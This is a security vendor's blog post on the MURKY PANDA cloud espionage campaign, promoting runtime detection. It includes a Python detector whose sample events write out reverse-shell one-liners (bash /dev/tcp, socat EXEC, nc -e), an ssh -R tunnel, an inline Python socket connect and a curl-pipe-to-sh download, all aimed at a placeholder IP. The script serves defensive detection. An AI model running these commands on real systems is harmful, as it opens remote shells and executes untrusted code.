August 21, 2025 – CrowdStrike disclosed ongoing activity by MURKY PANDA, a state-aligned Chinese espionage group purpose-built for the cloud. Unlike many threat actors who adapt legacy tactics, MURKY PANDA designs operations around cloud-native infrastructure from the ground up. Their latest campaign combines a Linux malware strain, a Commvault zero-day exploit, and identity abuse in Microsoft Entra ID to achieve long-term persistence, all while evading traditional detection.

Overview

State-backed groups have targeted cloud assets for years, but MURKY PANDA marks a turning point. Its operations are not on-premises tactics lifted into the cloud; they are engineered around the trust models and identity fabrics specific to SaaS, IaaS, and hybrid environments.

Targets include government agencies, research institutions, multinational tech firms and, increasingly, law firms and professional services providers that act as custodians of sensitive data. What makes the group dangerous is not just its malware. It is its ability to weaponize the implicit trust built into cross-tenant permissions, service principals, and delegated access.

[Screenshot] Upwind’s Cloud Baselines go beyond traditional threat detection methods to automatically highlight suspicious or malicious network and process activities.

Technical Analysis: A Campaign That Blends In

CrowdStrike’s reporting highlights how MURKY PANDA gains access and maintains stealth through three primary mechanisms:

  • Custom Linux Malware: CloudedHope
    A lightweight Linux implant tailored for containerized cloud workloads. It avoids noisy actions such as file system modification and privilege escalation and instead blends into ordinary process execution and network traffic, keeping command-and-control (C2) alive through commodity tooling such as Python sockets and socat.
  • Exploitation of CVE-2025-3928 (Commvault Zero-Day)
    Used for initial access. Per the CVE description, the flaw in Commvault Web Server lets a remote, authenticated attacker create and execute webshells, so the exploit turns backup infrastructure, the system meant to protect critical data, into the entry point.
  • Identity Abuse in Microsoft Entra ID
    By manipulating service principals and abusing Delegated Admin Privileges (DAP) and Granular Delegated Admin Privileges (GDAP) relationships between a Microsoft partner tenant and its customer tenants, MURKY PANDA moves laterally across federated environments under the cover of legitimate credentials.

Each action is deliberate. Each blends into normal administrative behavior. And in log data, each appears indistinguishable from authorized activity.

Why Log-Based Security Fails in the Cloud

Most security teams depend on logs (API activity, audit trails, authentication events) to detect threats. But MURKY PANDA’s approach highlights why this model fails against cloud-native adversaries:

  • Valid Credentials Look Legitimate
    Actions taken with an abused service principal are authenticated and authorized, so they are logged as successful, routine operations. Unless you baseline which principals act from where, or alert on credential additions to service principals (which the Entra audit log does record), nothing stands out.
  • Low-Noise Persistence
    Reverse tunnels via ssh -R and reverse shells via socat run as ordinary processes, drop no files, and leave little forensic residue.
  • Invisible Process-Level Activity
    Inline Python socket code (python -c '...') and outbound TLS sessions opened with openssl s_client happen inside the workload; cloud API logs and audit trails never record them.

From a log-only perspective everything looks normal until data leaves the environment, and by then it is too late.

Runtime Visibility: Seeing What Logs Miss

Catching groups like MURKY PANDA requires runtime visibility and monitoring workloads at the process, network, and command-execution level. Activity-based baselining and deviation detection expose malicious actions that logs never surface.

Had runtime visibility been applied during this campaign, defenders would have seen clear compromise signals:

  • Reverse shell creation with nc or socat
  • SSH reverse tunneling via ssh -R
  • Inline Python socket code executed for C2
  • Outbound encrypted sessions opened with openssl s_client
  • Download-and-execute pipelines such as curl | sh
[Screenshot] Upwind’s GenAI Threat Stories detect advanced attack patterns, connecting the dots between seemingly isolated events leading up to a security incident.

Each of these actions is a clear signal of compromise, but only if you’re watching the system in motion, not the logs in retrospect.
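The five signals above can be matched directly on process-execution events. The script below is an added example, not Upwind’s or CrowdStrike’s code: it runs a small rule set over a constructed list of exec records in the shape an eBPF execve tracer emits (pid, ppid, comm, and the command line joined into one string). All pids, hostnames and the 203.0.113.7 address are constructed. The rules are signatures, not the behavioral baselining the page describes; in a real pipeline they would run alongside a per-workload baseline so that the first-ever socat or ssh -R in a container is itself a deviation worth a look.

```python
"""Flag the reverse-shell and tunneling patterns listed above in process-exec events.

Event records are constructed for this example in the shape an eBPF execve tracer
produces: pid, ppid, comm, and the command line joined into one string.
"""
import re
import shlex
from dataclasses import dataclass


@dataclass(frozen=True)
class ExecEvent:
    pid: int
    ppid: int
    comm: str
    cmdline: str


SHELLS = {"sh", "bash", "dash", "zsh", "ash"}
NETCATS = {"nc", "ncat", "netcat"}
# nc/ncat: -e or -c (also fused, e.g. -lvpe) or the long forms --exec / --sh-exec
NC_EXEC_FLAG = re.compile(r"^(-[a-zA-Z]*[ec][a-zA-Z]*$|--(sh-)?exec)")
# curl/wget piped straight into a shell, anywhere in the command line
PIPE_TO_SHELL = re.compile(r"\b(curl|wget)\b[^|]*\|\s*(sudo\s+)?(ba|da|z|a)?sh\b")


def _argv(cmdline: str) -> list[str]:
    try:
        return shlex.split(cmdline)
    except ValueError:  # unbalanced quotes: degrade to a whitespace split rather than drop the event
        return cmdline.split()


def classify_exec(cmdline: str) -> list[str]:
    """Return the signal names one exec matches (empty list for benign look-alikes)."""
    argv = _argv(cmdline)
    if not argv:
        return []
    prog = argv[0].rsplit("/", 1)[-1]  # /usr/bin/nc -> nc
    args = argv[1:]
    lowered = cmdline.lower()
    hits: list[str] = []

    # 1. Reverse shells: nc -e, socat EXEC:/SYSTEM: with a TCP address, or bash's /dev/tcp idiom.
    if (
        (prog in NETCATS and any(NC_EXEC_FLAG.match(a) for a in args))
        or (prog == "socat" and ("exec:" in lowered or "system:" in lowered) and "tcp" in lowered)
        or (prog in SHELLS and "/dev/tcp/" in cmdline)
    ):
        hits.append("reverse_shell")

    # 2. SSH remote port forward: -R as its own token or fused (-R2222:localhost:22). -L is not flagged.
    if prog == "ssh" and any(a == "-R" or (a.startswith("-R") and len(a) > 2) for a in args):
        hits.append("ssh_remote_forward")

    # 3. Inline Python that touches the socket module: python -c '...socket...'
    if prog.startswith("python") and "-c" in args:
        code = " ".join(args[args.index("-c") + 1:])
        if re.search(r"\bsocket\b", code):
            hits.append("inline_python_socket")

    # 4. Outbound TLS session opened from a shell tool rather than an application.
    if prog == "openssl" and args[:1] == ["s_client"] and "-connect" in args:
        hits.append("openssl_s_client")

    # 5. Download-and-execute pipelines.
    if PIPE_TO_SHELL.search(cmdline):
        hits.append("pipe_to_shell")

    # A shell wrapper (sh -c "...") hides the real program in one argument: classify the inner command too.
    if prog in SHELLS and "-c" in args and args.index("-c") + 1 < len(args):
        hits.extend(classify_exec(args[args.index("-c") + 1]))

    return list(dict.fromkeys(hits))  # de-duplicate, keep first-seen order


def scan(events: list[ExecEvent]) -> list[tuple[int, str]]:
    """(pid, signal) for every event that matches at least one rule."""
    return [(ev.pid, sig) for ev in events for sig in classify_exec(ev.cmdline)]


# Constructed events: seven matching the signals above, four benign look-alikes that must not fire.
SAMPLE_EVENTS = [
    ExecEvent(4101, 1, "bash", "bash -i >& /dev/tcp/203.0.113.7/4444 0>&1"),
    ExecEvent(4102, 4101, "socat", "socat TCP:203.0.113.7:4444 EXEC:/bin/sh,pty,stderr"),
    ExecEvent(4103, 1, "ssh", "ssh -fN -R 2222:localhost:22 user@203.0.113.7"),
    ExecEvent(4104, 1, "python3",
              "python3 -c 'import socket,subprocess;s=socket.socket();s.connect((\"203.0.113.7\",4444))'"),
    ExecEvent(4105, 1, "openssl", "openssl s_client -quiet -connect 203.0.113.7:443"),
    ExecEvent(4106, 1, "sh", 'sh -c "curl -fsSL http://203.0.113.7/stage2.sh | sh"'),
    ExecEvent(4107, 1, "nc", "nc -e /bin/sh 203.0.113.7 4444"),
    ExecEvent(5201, 1, "ssh", "ssh -L 8080:localhost:80 user@bastion.internal"),   # local forward
    ExecEvent(5202, 1, "nc", "nc -zv db.internal 5432"),                           # port check, no -e
    ExecEvent(5203, 1, "curl", "curl -fsSL https://deploy.internal/health"),        # download, no pipe
    ExecEvent(5204, 1, "openssl", "openssl x509 -in /etc/ssl/server.pem -noout -dates"),
]

if __name__ == "__main__":
    for pid, signal in scan(SAMPLE_EVENTS):
        print(f"pid {pid}: {signal}")
```

The wrapper rule matters in practice: an attacker who runs `bash -c 'nc -e /bin/sh ...'` produces an exec whose argv[0] is bash, so a rule keyed only on the program name misses it unless the inner command is classified too.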

How Upwind Protects You From MURKY PANDA

MURKY PANDA’s campaign highlights a broader reality: cloud-native threats are no longer rare, they are the new baseline. With over 24,500 vulnerabilities disclosed in 2025 alone and attackers increasingly abusing cloud trust relationships instead of just CVEs, traditional log-based defenses leave organizations blind.

[Screenshot] The enhanced Upwind Threat Dashboard shows why runtime security is imperative: against MURKY PANDA’s cloud-native attacks, only runtime visibility cuts through the noise and exposes real threats as they happen.

Upwind provides runtime visibility and protection to detect and stop campaigns like MURKY PANDA by enabling you to:

  • Deliver Proactive Protection
    When Upwind detects activity consistent with advanced actors like MURKY PANDA, your team receives detailed, environment-specific guidance to mitigate risks before attackers can exfiltrate data.
  • Expose Hidden Blind Spots
    Upwind automatically baselines your cloud workloads, identifying abnormal process execution and network tunneling that log-based tools miss.
  • Detect Lateral Movement in Real Time
    Upwind surfaces abuse of service principals and GDAP/DAP trust relationships alongside the tunneling behaviors its eBPF-powered runtime monitoring observes on the workload (ssh -R, socat, inline Python sockets) the moment they occur.
  • Correlate and Prioritize Threats
    Each detection is enriched with runtime context, tying together identity abuse, malware execution, and network anomalies so your team can rapidly assess intent and take action.

Schedule a call with us today to learn more about how Upwind detects lateral movement, reverse shells, and command-level attacks, in real time, across every layer of your cloud environment.